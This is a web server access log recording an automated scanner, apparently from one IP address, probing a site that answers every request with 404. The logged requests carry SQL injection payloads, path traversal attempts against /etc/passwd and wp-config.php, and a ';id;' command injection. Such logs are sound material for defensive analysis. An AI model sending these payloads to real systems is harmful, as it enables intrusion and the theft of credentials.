137.220.197.141 - - [21/Jan/2024:15:03:30 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:03:33 +0100] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:04:06 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:04:15 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:04:27 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:04:36 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:05:03 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:05:36 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:06:32 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:06:42 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:06:50 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:06:54 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:07:04 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:07:06 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:07:37 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:07:52 +0100] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:08:07 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:08:15 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:08:24 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:08:32 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:08:33 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:08:33 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:08:35 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:10:17 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:10:41 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:10:41 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:10:56 +0100] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:10:56 +0100] "GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:11:04 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:11:06 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:11:14 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:11:16 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:11:29 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:11:39 +0100] "GET /web.config.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:11:41 +0100] "GET /SWNetPerfMon.db.i18n.ashx?l=prtlr&v=prtlr HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:11:45 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:12:04 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:12:25 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:12:27 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:12:48 +0100] "POST /service/rapture/session HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:12:49 +0100] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:14:24 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:15:25 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:15:34 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:15:41 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:15:52 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:16:03 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:17:22 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:17:33 +0100] "GET /backupsettings.dat HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:17:45 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:17:59 +0100] "GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:18:53 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:19:34 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:19:52 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:20:52 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:22:24 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:22:35 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:22:48 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:23:16 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:25:01 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:25:12 +0100] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:25:44 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:25:48 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:26:10 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:26:57 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:27:15 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:27:20 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:27:22 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:27:26 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:27:30 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:27:32 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:27:37 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:27:44 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:28:44 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:28:53 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:29:03 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:29:15 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:29:17 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:30:47 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:31:06 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:31:17 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:31:33 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:31:39 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:31:57 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:31:57 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:32:17 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:32:19 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:32:20 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:32:23 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:32:38 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:32:40 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:32:43 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:33:00 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:33:02 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:33:24 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:33:37 +0100] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:35:40 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:35:46 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:35:56 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:36:23 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:36:55 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:37:05 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:37:17 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:37:44 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:37:49 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:37:51 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:38:01 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:38:04 +0100] "POST /mailingupgrade.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:38:37 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:38:43 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:38:51 +0100] "GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:39:20 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:39:31 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:39:43 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:39:45 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:39:47 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:39:56 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:39:58 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:40:00 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:40:04 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:40:39 +0100] "GET / HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:15:40:46 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:40:49 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:40:54 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:41:10 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:41:10 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:41:29 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:41:31 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:42:17 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:42:19 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:43:18 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:44:10 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:44:34 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:44:43 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:44:50 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:44:52 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:44:54 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:45:17 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:45:25 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:45:27 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:45:29 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:46:05 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:46:07 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:46:09 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:46:23 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:46:36 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:46:48 +0100] "GET /ucmdb-api/connect HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:46:53 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:48:47 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:49:21 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:50:40 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:50:45 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:50:47 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:50:51 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:50:59 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:51:02 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:51:13 +0100] "POST /v2/api/product/manger/getInfo HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:52:03 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:53:47 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:53:49 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:54:32 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:54:50 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:54:53 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:55:07 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:55:09 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:55:09 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:55:12 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:55:18 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:55:30 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:55:38 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:55:40 +0100] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:56:16 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:56:18 +0100] "GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:56:20 +0100] "POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:56:47 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:57:05 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:03 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:08 +0100] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:13 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:15 +0100] "GET /cgi-bin/live_api.cgi?page=kHj&id=7&ip=;id; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:24 +0100] "GET /files/ldap.debug.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:39 +0100] "POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:15:58:48 +0100] "GET /api/experimental/test HTTP/1.1" 404 952
